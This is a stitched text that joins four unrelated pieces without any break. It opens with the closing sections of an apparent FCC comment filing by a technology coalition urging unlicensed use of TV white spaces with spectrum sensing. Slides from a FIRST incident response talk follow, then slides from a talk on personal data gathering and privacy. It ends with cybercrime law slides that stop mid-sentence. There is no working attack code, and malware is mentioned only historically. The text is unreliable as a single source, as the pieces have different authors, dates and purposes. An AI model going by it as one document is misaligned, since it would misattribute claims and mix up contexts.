dynamic range of 6 dB, and asks whether a greater dynamic range of power limits might be appropriate as long as that power level is still sufficient to communicate.25 The Coalition suggests a minimum TPC dynamic range of 20 dB, which will provide 14 dB more protection than was proposed by the Commission.26 Moreover, this recommendation is in addition to the 6 dB reduction from the original operating parameters proposed in the NPRM that will be realized by using antennas with a maximum of 0 dBi (unity gain). Coalition members plan to design devices that, while capable of transmitting at a maximum power of 100 mW EIRP, will 21 Id. ¶ 53. 22 Id. 23 Id. ¶ 45. 24 Id. 25 Id. 26 Id. 13 employ TPC whenever possible to ensure that the minimum power required for reliable transmission between the transmitter and the receivers within range is used. 2. Other technical considerations. The Commission also seeks comment on a number of specific proposals regarding technical rules necessary to implement a spectrum sensing approach.27 The Coalition agrees that the majority of these proposals will help ensure the successful implementation of spectrum sensing for unlicensed devices operating in the TV band.28 Channel availability check time, move time, and non-occupancy period - The Coalition agrees with the Commission that unlicensed devices should establish that a TV channel is vacant at a particular time and geographic location before transmitting. The Commission asks whether there is a need to provide a specific period of time over which initial sensing must occur.29 It should not. There is no need to specify a standard sensing interval for all devices, as the optimum check time for each device will be dictated by algorithms implemented by each manufacturer to meet the minimum threshold of detection requirements that the Commission ultimately requires. The Commission should specify only the required threshold of detection, and the time to sense that level should be left to the manufacturer, provided the prerequisite sensitivity is achieved before a signal is transmitted. 27 Id. ¶¶ 40-48. 28 Id. ¶ 34 (“Based on our experience in developing the spectrum sensing rules for 5 GHZ U-NII devices, we do, however, believe that the DFS approach in those rules can, with appropriate modifications, be applied to TV band devices.”). 29 Id. ¶ 41. 14 The Coalition also believes that a requirement to re-check a particular channel in use by an unlicensed device operating in the TV bands would not be unreasonable,30 though a requirement to re-check every 10 seconds is wholly unnecessary and would reduce the throughput of unlicensed devices with no appreciable increase in protection for broadcasters. Rather, in light of the “always on” nature of incumbent licensees, a re- check requirement on the order of one minute is more appropriate. With respect to move time after a station’s presence is detected, however, the Coalition believes that the period of 10 seconds proposed by the Commission in the First Report and Order is sufficient.31 Finally, the Coalition agrees with the Commission that it is unnecessary to establish a fixed period during which an unlicensed device operating in the TV bands must stay off the air in a particular channel after the device determines that the channel is occupied.32 As the Commission has observed, incumbent licensees will receive adequate protection from unlicensed devices operating in the TV bands, even without a requirement to stay off a channel for a particular period of time—as devices still will be required to confirm that a channel is unoccupied at the commencement of operation and to periodically monitor that channel for use by incumbent licensees.33 Adjacent Channel Interference - The Commission has recognized that low power personal/portable devices are not likely to pose an interference problem when operating 30 Id. 31 See id. Appx. B, Proposed Rules, § 15.707(f)(iii). 32 Id. ¶ 41. 33 Id. ¶ 41. 15 in channels adjacent to channels occupied by TV signals.34 Nevertheless, the Commission seeks comment on the need for adjacent channel sensing by such devices.35 Although the potential for harmful adjacent channel interference by low power personal/portable devices operating within the parameters proposed herein is small, the Coalition is not opposed to some measures to provide a greater degree of confidence that incumbent licensees will not face harmful interference. The Coalition plans to utilize TPC combined with over-the-air sensing to achieve Commission-mandated adjacent channel D/U (desired to undesired) signal ratios, and is confident that Commission testing of the Coalition’s prototype will verify that this approach is more than adequate to project incumbent licensees on adjacent channels. The Coalition’s own testing strongly suggests that the FCC laboratory will be able to confirm that an outright ban on adjacent channel usage by low power devices is not necessary or advisable, and will serve only to create an artificial scarcity of white spaces in congested areas. The ability to offer devices that will work in both urban and rural areas will create a substantially more robust market—with resulting economies of scale and scope—than would a market made up of devices that could operate only in rural areas. Sensing bandwidth - The Commission also has inquired as to whether it should specify a particular minimum sensing bandwidth in addition to the detection threshold.36 34 NPRM ¶ 30 (“We … believe that the requirements needed to protect television service from digital unlicensed devices should be limited to co- and adjacent channel operations only for fixed/access operations and co-channel operations only for personal/portable operations.”). 35 FNPRM ¶ 42. 36 Id. ¶ 43. 16 It should not. Consistent with the Coalition’s view that the Commission should mandate performance requirements rather than specific implementation schemes, industry should be allowed to determine the implementation that works best for each device. In this way, the Commission can ensure that innovative approaches to interference avoidance are not stifled by “one size fits all” implementation requirements. Antenna Requirements - The Commission has proposed the use of an omni- directional antenna with a gain of 0 dBi (unity gain) for sensing, and asks what considerations need to be taken into account if devices use a gain antenna for transmitting.37 As noted above, the Coalition is not opposed to a requirement that both receive and transmit antennas have a maximum gain of 0 dBi, which will provide further assurances that incumbent licensees will be protected from harmful interference. The Commission also asks whether it should establish minimum transmit height antenna requirements or require reduction in power when antennas are above a certain height.38 The Coalition believes that, for personal/portable devices, height restrictions should not be imposed since they would be impossible to administer and are unnecessary given the low power (below 100 mW EIRP) at which these devices would operate. However, the Coalition recommends that devices should not have antennas that can be removed by the consumer, and that consumers should not be permitted to connect devices to separate external antennas. Spectrum Sharing - The Coalition applauds the Commission’s recognition that industry has the capability to develop standards and protocols that will facilitate sharing 37 Id. ¶ 44. 38 Id. 17 of TV white spaces.39 However, the Coalition also agrees with the Commission that the ability of a single device or network to monopolize a particular channel or geographic area would dramatically decrease the usefulness of these bands.40 Thus, the Coalition is not opposed to a minimal regulatory requirement to ensure spectrum sharing among devices. Specifically, the Coalition proposes a maximum channel occupancy time of 400 milliseconds, to be followed by a minimum 100 microsecond interval during which the device may not transmit on the previously vacated channel. Because this restriction will be more than sufficient to ensure that one device does not monopolize a particular channel, the Commission should not impose additional restrictions, such as prohibiting simultaneous transmission on more than one channel, on unlicensed devices. Distributed Sensing – Finally, the Commission has inquired about the possibility of implementing a requirement that TV band devices share channel availability information (“distributed sensing”) to reduce the threat of harmful interference.41 As discussed above, the Coalition has determined that a detection threshold of -114 dBm is more than sufficient to protect incumbent licensees. While the availability of distributed sensing presumably would allow the operation of devices with a less conservative detection threshold, the Coalition believes that the best approach would be to require all devices to operate at -114 dBm to ensure operation even in instances where channel availability information from other unlicensed devices may be unavailable. 39 Id. ¶ 47. 40 Id. 41 Id. ¶ 39. 18 D. Testing. The Coalition enthusiastically endorses the Commission’s commitment to perform lab testing to determine the true potential for harmful interference to incumbent licensees by devices operating in the TV white spaces.42 Rules for operation in TV white spaces should be guided by how actual prototype devices perform in a series of objective and unbiased tests, rather than on speculation fueled by experiments based on devices that no one plans to build with RF outputs designed to maximize interference. The Coalition already has responded to the invitation of the Office of Engineering and Technology to submit a prototype TV band device for testing,43 and will provide a prototype in the near future. It is the Coalition’s belief that the Commission’s testing will confirm that the proposed device will protect incumbent licensees from harmful interference, and that personal/portable devices utilizing spectrum sensing are a viable approach that not only should be permitted, but encouraged. If requested to do so, the Coalition stands ready to provide the Commission with qualified engineers to aid in the testing under Commission supervision and be available to answer questions concerning the prototype device. II. THE COMMISSION SHOULD NOT IMPOSE ADDITIONAL RESTRICTIONS ON PERSONAL/PORTABLE UNLICENSED DEVICES. Although the Commission’s initial Notice proposed using different interference avoidance mechanisms for fixed/access and personal/portable unlicensed devices, the Commission recognized in the Further Notice that certain interference avoidance 42 Id. ¶ 3. 43 See Public Notice: Office of Engineering and Technology Invites Submittal of Prototype TV Band Devices for Testing, DA 06-2571 (rel. Dec. 21, 2006). 19 schemes could be employed for both fixed and personal/portable devices.44 While the Commission has expressed concern that personal/portable devices could present a greater threat of harmful interference and interfering devices could be more difficult to locate,45 these concerns—even if valid—are more than offset by the much lower power at which personal/portable devices operate. More fundamentally, however, the Commission can alleviate harmful interference concerns by setting the underlying performance criteria it expects the devices to meet, and then allowing industry to implement the means to meet those criteria. As set forth in greater detail above, the spectrum sensing approach works for personal/portable devices, and the Coalition is confident that the Commission’s independent tests will confirm these results. The Coalition is particularly concerned that the Commission’s initial determination to permit the use of fixed devices, but to seek further comment on personal/portable devices,46 could presage delays in authorizing—or even failure to authorize—the use of such devices. Failure to authorize personal/portable devices would be a major blow to U.S. competitiveness and the nation’s consumers. Fixed devices can only be deployed if there is a service provider willing to invest in base station infrastructure and lease locations to situate base stations. In addition, as envisioned by the Commission, fixed devices must avoid adjacent channel operations, excluding access to significant amounts of spectrum in congested urban areas. 44 FNPRM ¶ 25. 45 Id. ¶ 18. 46 Id. ¶ 2. 20 These requirements will at best delay implementation and add significant unnecessary costs, increasing the likelihood that service providers will deploy infrastructure only in the most lucrative markets—once again depriving rural America of advances in broadband technology. In addition, the devices themselves will be much more expensive; the relatively limited deployment that a fixed requirement entails would create a far smaller market, thus limiting economies of scale and scope. Perhaps most importantly, the increased cost to consumers and the limited market would cause manufactures to reassess whether they should enter this market at all. Delaying the eventual authorization of personal/portable unlicensed devices would also be a serious mistake. The Coalition fully endorses the Commission’s commitment to allow the sale of TV band devices as of February 17, 2009, 47 and strongly urges the Commission not to change this date even in the unlikely event that the DTV transition is delayed. The Coalition has a personal/portable prototype specifically developed for the TV bands available today, and has solid roadmaps for delivery of innovative TV band unlicensed devices in the near term. Any concerns that the Commission has that may require further study and analysis are best accomplished now, while the Coalition and various other companies are eager to commit resources to help. Continuing to postpone a ripe decision (as the Commission has for the last two years) will inevitably drive domestic industry resources away from the TV white spaces. The time for the Commission to act is now—so that consumers can enjoy innovative products, and the U.S. can take the competitive lead in this space. 47 Id. ¶ 16. 21 III. THE WHITE SPACES SHOULD BE ALLOCATED FOR UNLICENSED USE. A. White Spaces are Ill-Suited for Deployment of Licensed Services. As the Commission has observed, allocating spectrum via license is appropriate when spectrum rights are (1) clearly defined; (2) exclusive; (3) flexible; and (4) transferable. 48 Spectrum rights lacking these attributes are more efficiently allocated through unlicensed operation.49 The Further Notice provides ample evidence that the TV white spaces do not meet the Commission’s criteria for licensed operation. Most significantly, a licensing regime will not lessen any of the obligations that would be imposed on devices under an unlicensed model. Devices still must transmit at lower power than typical licensed use, deploy a reliable means of determining whether a channel is in use by an incumbent licensee, and cease operation in cases where that spectrum is or becomes occupied by a licensee with a higher authorization.50 Such restrictions are not imposed on licensed use as a matter of course, and the Commission is therefore right to be concerned that “Unlicensed operations may … be better able to dynamically adapt to a shifting spectrum environment characterized by low power operation.”51 The Coalition concurs with the Commission; unlicensed operations are better able to adapt to a shifting spectrum environment, and thus are the appropriate use for the TV white spaces. 48 Id. ¶ 27. 49 Id. ¶ 27. 50 See id. ¶ 28. 51 Id. ¶ 29. 22 The fact that the “Swiss cheese” patterns of available TV white space spectrum are impractical to license is perhaps best illustrated by the Commission’s proposed channel re-check requirements. Devices must monitor spectrum because their “right” to transmit on a particular channel can be foreclosed at any time (for instance when a licensed wireless microphone commences operation), a situation that stands in stark contrast to the certainty typically afforded by a license.52 Moreover, TV band devices must implement power limits and other inflexible restrictions, and the ability to transmit is contingent on the unpredictable actions of others, including incumbent users with higher status (such as licensed wireless microphones). What happens, for example, to a TV white space licensee if the Commission decides to license a wireless microphone operator or another broadcaster within the territory of that white space licensee? TV band allocations do and will change, and it is hard to envision that any party would bid aggressively for a license filled with such restrictions and uncertainties. Finally, the Commission asks briefly whether it should consider a non-exclusive licensing model.53 It should not. The Commission began this proceeding with the recognition that the “significant growth of and consumer demand for unlicensed wireless broadband applications” supported opening up the white spaces for unlicensed use.54 Attempting to meet that demand by issuing a substantial number of non-exclusive licenses would impose significant burdens and expense on applicants as well as the 52 As the Commission has recognized, the amount of available spectrum not only varies dramatically based on geography, but also could be subject to change at a given time within a particular location. Id. ¶ 28. 53 Id. ¶ 31. 54 NPRM ¶ 7. 23 Commission, with no offsetting benefit. The Coalition urges the Commission to reject a non-exclusive licensing model, which would amount to nothing more than an unnecessary registration requirement for white space use. B. Unlicensed Use of White Spaces Will Provide Substantial Benefits. Even if the Commission were to successfully allocate TV white space spectrum to a handful of licensees, the case for unlicensed use of white spaces is far more compelling—particularly since the Commission will soon license more unencumbered 700 MHz spectrum in the DTV transition auctions. Before the advent of unlicensed Wi- Fi, the 2.4 GHz band was widely derided as a “junk band.” Yet use of Wi-Fi created a multi-billion dollar industry at a time when most telecommunications businesses were in a downturn, almost indisputably creating substantially greater value than if the band had been allocated for exclusive use.55 At last count, over one billion devices have been deployed in the 2.4 GHz band alone.56 The superior propagation characteristics of TV channels promise not only to replicate the success of unlicensed Wi-Fi deployments, but to outshine it. Unlicensed devices operating in the TV band will offer longer transmission ranges using the same power, less risk of signal attenuation or harmful interference, and less power consumption at the same range as Wi-Fi.57 55 See, e.g., Remarks of Kevin Werbach, Former FCC Counsel for New Technology Policy, Stanford University “Spectrum Policy: Property or Commons” Conference (Mar. 1, 2003), available at http://werbach.com/docs/spectrum_conf_comments.html (last visited Nov. 21, 2006); Jesse Sunenblick, Into the Great Wide Open, COLUMBIA JOURNALISM REVIEW (Mar./Apr. 2005). 56 See Bluetooth Technology in the Hands of One Billion, available at http://www.bluetooth.com/Bluetooth/SIG/Billion.htm (last visited Jan. 17, 2007). 57 This last characteristic becomes an especially significant consideration for mobile devices such as laptops and PDAs that rely on battery power. 24 Unlicensed use of the TV white spaces is particularly well suited for: • Media distribution. The improved bandwidth made possible by use of TV band spectrum will facilitate access to and management of electronic media, enabling innovations such as next generation home media centers that provide on-demand access to stored or streamed content—including high definition video—from any number of devices. In addition, the increased bandwidth afforded to unlicensed devices will make it more feasible for schools and other non-profit entities to provide enterprise tools such as videoconferencing at a number of receive points at those locations. • Point-to-multi-point systems. The favorable propagation characteristics of TV band signals will allow for deployment of more effective broadband access.58 WISPs can reach more customers with less infrastructure, and broadband deployment becomes substantially cheaper and quicker. • Neighborhood mesh networks. The range provided by TV band devices can be used to create self-organizing mesh networks free from subscription service and free from monthly charges. They can also substantially reduce deployment costs for municipal mesh network operators and help create ad hoc public safety networks. Indeed, mesh networks are particularly well suited to public safety and emergency response scenarios: o Delivery of Communications at Emergency Sites and in the Event of Catastrophic Network Failure. Mesh networks allow communications to be readily deployed in emergencies when existing communications infrastructure is damaged or unavailable. o Supplementing Existing Infrastructure When There is Degradation. Public safety personnel can use IP-based mesh networks to supplement dedicated public safety networks and provide emergency site local interoperability. o Aiding Resiliency. Because mesh networks have no single point of failure they assure reliability. As some of these likely applications illustrate, many advantages of the TV bands simply cannot be realized by licensed use. To be sure, there are also some benefits from licensed services; however, the Commission has already committed to licensing 60 MHz of spectrum in the 700 MHz band pursuant to the upcoming DTV transition auctions. 58 See FNPRM ¶ 13. 25 The only question is whether the distinct benefits of unlicensed services will also be made available. Thus, while the Coalition supports the licensed model for the spectrum to be cleared in the DTV transition, it urges the Commission to reaffirm its initial determination that the unlicensed model is most appropriate for the TV white spaces. In addition, the Further Notice overstates the possible benefits of licensed services in the TV white spaces. The Commission notes that one possible justification for licensed use is that it may facilitate the location and termination of sources of harmful interference.59 This rationale presupposes both that interfering licensed uses will be easier to shut off and that unlicensed users will have greater incentive to interfere— neither of which is true. As a threshold matter, once a licensed device becomes available in the marketplace, the licensee has no viable means by which to detect or prevent individual non-conforming interfering uses. For example, the Commission is aware that users have on occasion tampered with licensed devices such as cell phones, and also that these devices fail from time to time. Thus, licensed devices can cause harmful interference unbeknownst to the license holder. Even if an incumbent licensee suspects that harmful interference is a result of a licensed white space device and notifies the white space licensee, there is little the white space licensee can do about it short of shutting down a sizeable portion of its network—thus shutting down many unoffending devices to stop one offending device. 59 Id. ¶ 30. 26 Nor is it clear that licensed operators would have a greater economic incentive to ensure that deployed devices do not cause harmful interference.60 While the Commission can and does take action against non-conforming uses, neither of the Commission’s primary mechanisms for safeguarding against harmful interference—equipment authorization and fines—are in any way dependent on the licensing of services. Because licensed devices can be modified to work beyond the scope of their authorizations just as easily as unlicensed devices can, enforcement—not licensing—will be the primary deterrent to interference irrespective of the spectrum allocation approach the Commission ultimately adopts. The contention that licensees will have a greater incentive to ensure non- interfering use fails for the additional reason that those who intend to develop and deploy such devices are highly motivated to ensure that these devices do not cause harmful interference. The Coalition’s members have already invested substantial resources in the research and development of unlicensed TV band devices, and intend to invest even more upon receiving positive indications that such use will be permitted without onerous restrictions. The high tech industry has the expertise to ensure that devices do not cause harmful interference, and simply would not endanger substantial investments in such devices by creating the risk of FCC enforcement that would destroy the very market they seek to create. The Coalition also notes that its members have the economic incentive to ensure that the Commission finds the correct balance between allowing innovative new services 60 Compare, e.g., the substantial interference caused by Nextel Communications. Inc. to other licensees— including public safety operations—in the 800 MHz band. See generally Improving Public Safety Communications in the 800 MHz Band, Report and Order, 19 FCC Rcd. 14969 (2004). 27 and protecting incumbent licensees, as members of the Coalition derive substantial benefit from ensuring that demand for over-the-air TV is preserved. For example: • Philips, Dell, and HP are global leaders in developing and manufacturing digital televisions, collectively representing over 13 percent of the entire market for plasma and LCD TVs in North America. • Philips, Dell, and HP also make media center devices that enable viewing and recording of over-the-air DTV content. • Microsoft creates the software that powers these media center devices. For example, Windows XP Media Center Edition allows devices to store, rewind, and fast forward over-the-air DTV content, and includes a built-in antenna signal strength meter to allow the user to adjust his or her antenna to get the best reception possible.61 • Intel develops and markets tuner and demodulator products for digital televisions. This interest in the success of both broadcast TV and unlicensed technology stands in contrast to those of the broadcasters and other advocates of a licensing regime, who have absolutely no market incentive to heed the Commission’s concerns about balancing the needs of incumbents with obtaining substantial innovative value from the white spaces. Finally, the parameters proposed by the Coalition eliminate the fears expressed by some that individual unlicensed users will be compelled to transmit at the greatest possible power to be heard over the din, creating a “tragedy of the commons”—as advocates of a licensed regime would like the Commission to believe. 62 Indeed, the substantial success of unlicensed operations in the 2.4 GHz and 5 GHz bands demonstrates that the very opposite is true. The same success will happen for unlicensed devices in the TV white spaces, if the Commission allows it. 61 The ability to access over-the-air signals is also a crucial feature of the media center editions of Microsoft’s next generation Vista operating system. 62 See, e.g., Comments of Qualcomm, Inc. at 13 (filed Nov. 20, 2004); MSTV and NAB Comments at 25. 28 The Commission also speculates that a licensing regime may provide the most effective means of balancing competing uses in areas where the amount of unused TV band spectrum is comparatively low.63 However, there is no reason to believe that numerous unlicensed devices will be unable to share the TV white spaces effectively. For example, after the DTV transition, one of the more crowded markets in terms of incumbent licensees will be Trenton, New Jersey, which is served by numerous licensees in nearby cities including New York, Philadelphia, Newark, and Wilmington, DE. The New America Foundation has concluded that even this crowded market will have approximately 90 MHz of post-transition white space spectrum, most of which will be available for use by personal/portable devices assuming that such devices are authorized to use adjacent channels as the Coalition has proposed.64 Moreover, unlike TV stations, unlicensed devices will not always be transmitting. Finally, the Coalition notes that a number of technological advancements in telecommunications and computer networks, including substantial breakthroughs in multiplexing, have been driven by the need to share scarce resources. If white space spectrum in congested areas is heavily used by unlicensed devices, this scenario may well encourage development of technologies that could use that spectrum more efficiently. 63 FNPRM ¶ 30. 64 See Free Press and New America Foundation, Measuring the TV “White Space” Available for Unlicensed Wireless Broadband at 49 (Nov. 18, 2005) available at http://www.newamerica.net/files/archive/Doc_File_2713_1.pdf (last visited Dec. 14, 2006). 29 IV. OTHER ISSUES. A. Out of band Emission Limits. The Commission has proposed to require TV band devices to comply with the out of band emission limits set forth in Section 15.209 of its rules, but seeks comment as to whether different emission limits would be more appropriate.65 With the exception of adjacent channel interference discussed above, the Coalition believes that Section 15.209 provides more than adequate out of band emission limits. B. Direct Pickup Interference/Receiver Desensitization. The Commission seeks comment as to whether operation of unlicensed devices in close proximity to TV receivers would affect receivers adversely, either through direct signal pickup through the receiver chassis or by “desensitizing” the receiver so that it receives harmful interference on each channel.66 The Coalition has confirmed that, by operating within the parameters it is proposing, devices will not cause these problems, and looks forward to the Commission’s testing, which the Coalition is confident will verify these results. C. Wireless Microphones. The Coalition has determined that the proposed -114 dBm threshold detection sensitivity used to protect TV receivers also is more than adequate to protect licensed wireless microphones. Theoretical and empirical studies conducted by the Coalition verify that the proposed operating parameters that it has chosen will protect licensed wireless microphones. The Coalition is confident that Commission testing will confirm 65 FNPRM ¶ 60. 66 Id. ¶ 62. 30 that the Coalition prototype will provide wireless microphone licensees with the interference protection to which they are entitled. D. Unlicensed Use in Border Areas. Finally, the Commission has observed that, under current international agreements with Canada and Mexico, certain low power TV operations must be referred to these countries for prior approval.67 Specifically, low power TV assignments within 20 miles of the Canadian border and 25 or 37 miles (for low power UHF and VHF, respectively) from the Mexican border require prior approval for operation.68 The Commission seeks comment as to whether these agreements must be modified before unlicensed operations can commence in these areas.69 The Coalition believes that the pre-approval requirements in these agreements would not need to be modified. The concerns the Commission has raised relate to restrictions on TV station operations, not on other devices that may operate in the TV bands using significantly less power than even low power TV stations. More fundamentally, however, use of TV band devices is not inconsistent with these agreements assuming the devices use spectrum sensing to avoid Mexican and Canadian 67 Id. ¶ 65. 68 See Working Arrangement for Allotment and Assignment of VHF and UHF Television Broadcasting Channels under the Agreement between the Government of the United States of America and the Government of Canada Relating to the TV Broadcasting Service, (Mar. 1, 1989), available at http://www.fcc.gov/ib/sand/agree/files/can-bc/can-tv.pdf (last visited Nov. 22, 2006); Agreement Amending the Agreement Relating to Assignments and Usage of Television Broadcasting Channels in the Frequency Range 470-806 MHz (Channels 14-69) along the United States-Mexico Border (Nov. 21, 1988), available at http://www.fcc.gov/ib/sand/agree/files/mex-bc/lpuhfbc.pdf (last visited Nov. 22, 2006); untitled amendment to the United States-Mexican agreement on VHF stations dated Sept. 14- 26, 1988, available at http://www.fcc.gov/ib/sand/agree/files/mex-bc/lpvhfbc.pdf (last visited Nov. 21, 2006). 69 FNPRM ¶ 65. 31 TV signals. To that end, the Coalition’s prototype device has been designed to detect not only the digital television signals that will be used in the United States, but also analog television signals that may still be in use in Canada and Mexico after the U.S. DTV transition has completed. Accordingly, the Commission should not require modification of either of these agreements before allowing unlicensed use of the TV whitespaces. CONCLUSION The Commission’s decision to allow wireless devices to access unused broadcast TV spectrum is a promising first step toward providing ubiquitous and affordable Internet access, as well as toward the development and deployment of a number of exciting and innovative new consumer technologies and services. However, these goals can only be realized if the Commission adopts minimal technical and operational rules that will allow innovation to flourish. Each implementation decision the Commission makes should provide incumbent licensees with adequate protection from harmful interference, while maximizing the potential uses of the TV white spaces by adopting flexible rules that will allow for the widespread deployment of personal/portable devices. In particular, the Commission should reaffirm its initial determination that the unlicensed model is most appropriate for the TV white spaces, concurrently authorize the use of personal/portable and fixed/access devices, and adopt spectrum sensing with a detection threshold of -114 dBm as a means by which unlicensed devices may avoid causing harmful interference. In doing so, the Commission can help ensure that all Americans derive substantial benefit from this valuable public resource and that the U.S. leads the way in technological innovation in this space. 32 Respectfully submitted, /s/ Scott Blake Harris Scott Blake Harris Edmond J. Thomas∗ S. Roberts Carter III HARRIS, WILTSHIRE & GRANNIS LLP 1200 Eighteenth Street, NW Washington, DC 20036 (202) 730-1300 ∗ Senior Policy Advisor
Incident Response Art, Science and Engineering Maarten Van Horenbeeck maarten@first.org • @maartenvhb • Director of Security Engineering at • Director and former Chairman of • Incident Responder. 你好 Ithaca, New York Population 30,513 1988 Morris worm The times, they are a-changing. Bob Dylan, 1964 FIRST.Org, Inc. All rights reserved. 7 Source: Traffic Signal Preemption in Millersville,PA by Wikipedia user Niagara An internet of Things 8 Internet users in percentage, UN Human Development Report 2014 (Google Data) An internet of People Art, science and engineering Dealing with complexity • Art: • “Quality according to aesthetic principles of what is appealing” • Science: • “Branch of knowledge or study dealing with facts or truths showing general laws” • Engineering: • “Creating large structures using scientific methods” • Art: • “Quality according to aesthetic principles of what is appealing” • Science: • “Branch of knowledge or study dealing with facts or truths showing general laws” • Engineering: • “Creating large structures using scientific methods” Our common history Lahore, Pakistan Population 5.143 million 1986 Pakistani Brain Hex dump of a Pakistani Brain infected floppy – by Avinash Meetoo (Wikipedia) Manila, Philipines Population 23 million 2000 LOVE-LETTER-FOR-YOU.txt.vbs 2007 Brussels, Belgium Population 1.2 million Targeted attacks Natanz, Iran 2010 Population 12,060 STUXNET .stub, mrxnet.sys Vulnerability in Windows Shell Design issue, previously used in Zlob DLL Preloading vulnerability Stuxnet Vulnerability in Task Scheduler Hash collision Vulnerability in Windows Shell Design issue, previously used in Zlob DLL Preloading vulnerability Stuxnet Vulnerability in Task Scheduler Hash collision Vulnerability in Windows Shell Design issue, previously used in Zlob Vulnerability in Win32k Memory corruption DLL Preloading vulnerability Stuxnet Vulnerability in Windows Shell Design issue, previously used in Zlob Vulnerability in Print Spooler Design issue Vulnerability in Win32k Memory corruption Vulnerability in Task Scheduler Hash collision DLL Preloading vulnerability Stuxnet 2011 Khartoum, Sudan Population 6.5 million Duqu Beverwijk, The Netherlands 2011 Population 40,049 DigiNotar DigiNotar DigiNotar FIRST.Org, Inc. All rights reserved. 35 Map of open SSDP servers, The Shadowserver Foundation Cyberspace 2014 FIRST.Org, Inc. All rights reserved. 36 Amplification DDoS 2014 Map of open SSDP servers, The Shadowserver Foundation 38 Oulu, Finland Lowest temperature on record -34 C 2014 39 Heartbleed 40        Dealing with complexity FIRST.Org, Inc. All rights reserved. 42 Internet Map 2004, Steve Jurvetson FIRST.Org, Inc. All rights reserved. 43 FIRST.Org, Inc. All rights reserved. 43 Historical map of trade routes, Library of the University of Texas at Austin Dealing with complexity • “Know who you’re selling to” • Build a community where we can reach others… • … and understand what others do. • “Transportation” • Build the right tools for the job. Let automation do the hard work, humans the smart work. • “Lingua franca” • Develop standards to work together better. Dealing with complexity • You make partners before you need them • Connect with industry groups and competitors • Participate and share information • Know which technologies you know, and which you don’t • Do you have or partner with reverse engineers? • When something is the right thing to do, do it • Track and participate in standards • We all should have done this with BCP38  • Researchers help protect your organization • Cherish and encourage their work 46 多謝 Questions? maarten@first.org
Every Breath You Take ::data gathering, persistence, and what it all means:: jim.oleary|dc0f WARNING: STATIC CONTENT One of the overriding themes of this talk is that once a piece of data has been captured, it’s forever retrievable. In the spirit of that principle, these made-for-CD slides have been watered down a little bit, in order to prevent any unintentional long-lived copyright violations, overly offensive topics or other goof ups . Dynamic, up-to-date slides can be pulled from: http://dl.jimio.com/dc0f/ebyt.pdf Abstract • How much data do you generate in the process of living an ordinary day? This talk covers various ways to gather, persist and analyze the data stream that is your life. We’ll cover a few of the approaches that are available today, some easy code you can whip up to persist anything you please, and what to expect from the community and businesses moving forward. Privacy/security impact is sure to be huge, so hold on to your hats, and start tracking and logging everything! Somebody else may be doing it for you already.. TODO: Data * • Definition • Gathering – Who, What, Where, When, Why, How? • Persistence – Who, What, Where, When, Why, How? • Mirroring • Analysis • Forecasting / Targeting Allow myself.. • Jim O’Leary, aka jimio – In the security game since about 2000 – CompSci & Psych background – Mostly whitehat / corporate stiff – Enjoys: design, coding, breaking code, long walks • Contents of this talk do not reflect the views of my employer, friends, countrymen, etc. Data: Definition STUFF Data: Classification Data: Awareness • Information is your friend! • Knowledge is power! • The Vegas Hustle – Try to find a clock anywhere near a game table – Abstract tokenization of your cold, hard cash – Endless free drinks to modify perception – Chummy pit bosses, scantily-clad waitresses – Overwhelm and distract, only to take your money Data: Gathering Acquisition Methods / Data Types Push email Pull RSS Voluntary Twitter Involuntary ISP snooping Manual Pen and paper Self-regulating Whitelisted / targeted Self aware? Intelligent sync, data resolution Inadvertent Whoops! Data: Gathering - Fun • We are in Vegas, after all.. (quick contest, w/ prizes : details announced mid-talk) Data: Harvesting • Massive server farm would be nice and all.. – Expensive – Time consuming • ..so have somebody else do it for you – GOOG, MSFT, YHOO, INSP.. – Just speak HTTP/HTML, and you’re good to go – Quick demo Data: Persistence • A moment like this – Digital photography’s influence – Huge increase in the # of data-feeding nodes • What’s been done can’t be undone, son – Sure, you can remove the “tag” in the photo – Sure, you can delete those pictures from your camera – Once it’s been captured, it’s out of your control forever Social Networking • Facebook – Digital representation of my social life – News feed to passively monitor your friends • Who’s doing what, where? • Image tagging / Facebook paparazzi • The “in a relationship” struggle • Myspace – Friends, Bands, Bulletins, Events – Glittery roses, pouty lips, XSS worms Security Through Obscurity Privacy Through Obscurity Data: Privacy • Don’t want to get caught? – Don’t do it – Do it, lie about it – Do it, try to delete all the evidence – Do it, tell all your friends in person – Do it, tell your friends online – Do it, take pictures – Do it, post pictures online – Do it, lie about it, change mind, issue press release The Sex Tape Era [more examples] Data: Elusiveness • Need to send something? – Do it on your own terms – Encrypt! – Minimize server hops/exposure • HTTPS, just do it. Data: Mirroring • The “moment in time” principle – Nowness tied to data value – Presence seems ok – Presence history is just creepy • That’s why you do it yourself.. • Personomies – Digital representations of self – Skip the resume, hit up Google Data: Analysis • Now that we’ve got it, what do we do? – Identify patterns – Find trends – Simulate and model situations – Profit. Analysis: Some Fun Demos • Can a brother get a _____? – Cliché / snowclone iteration finder • For Unlawful Carnal Knowledge – Article Parser, Pattern Recognition • Inadvertent Haiku Finder – Article Parser, Natural Language Processor, Pattern Recognition Data: Analysis • Passive, non-invasive time travel and modeling – Way out there.. Matrix-type stuff – Given enough data to represent the physical world Data: Forecasting / Targeting • Marketing’s wet dream • Actually, a ton of consumer benefit – Providing it’s done correctly – Also a ton of embarrassment potential • Social network habits and dating inevitability Data: Misc • Few loose ends here.. EOF
Cybercrime: Challenges for Law Enforcement Susan Brenner NCR Distinguished Professor of Law & Technology University of Dayton Real-world & cybercrime Current approaches evolved to deal with real-world crime Cybercrime occurs in a different context and therefore presents different issues Example #1: Theft Real-world theft: possession of property shifts completely from A to B, i.e., A had it now B has it Cyber-theft: Property is copied, so A “has” it and so does B Copying as theft? Randall Schwartz worked for Intel Charged with computer theft for copying a password file Claimed it wasn’t theft because Intel did not “lose” anything – Intel still had the passwords, and so did Schwartz Example #2: Seizure Is copying files a seizure under the Fourth Amendment Same as theft? Nicky Scarfo logger Nicky Scarfo logger FBI executed warrant at Scarfo’s office Seized files from his computer – one was encrypted Agents installed a keystroke logger on his office PC, copied his passphrase – seizure? What is cybercrime? Cybercrimes are divided into 3 categories:  crimes where a computer is the target of the crime,  crimes where a computer is a tool of the crime, and  crimes where a computer is incidental to the commission of the crime. Computer as Target Hacking (trespass) Cracking (burglary) Malicious code (viruses, worms, Trojan horses) Vandalism (web site defacement) Denial of service attacks Target case: John Sullivan Hired to develop software program for Lance, Inc. Demoted, he hid a logic bomb in the program It shut down 824 handheld computers sales reps used to contact headquarters, costing Lance, Inc. over $100,000 U.S. v. Sullivan, 40 Fed. Appx. 740 (4th Cir. 2002) Target Case: Czubinski IRS customer service rep who could use IRS computers to answer customer questions 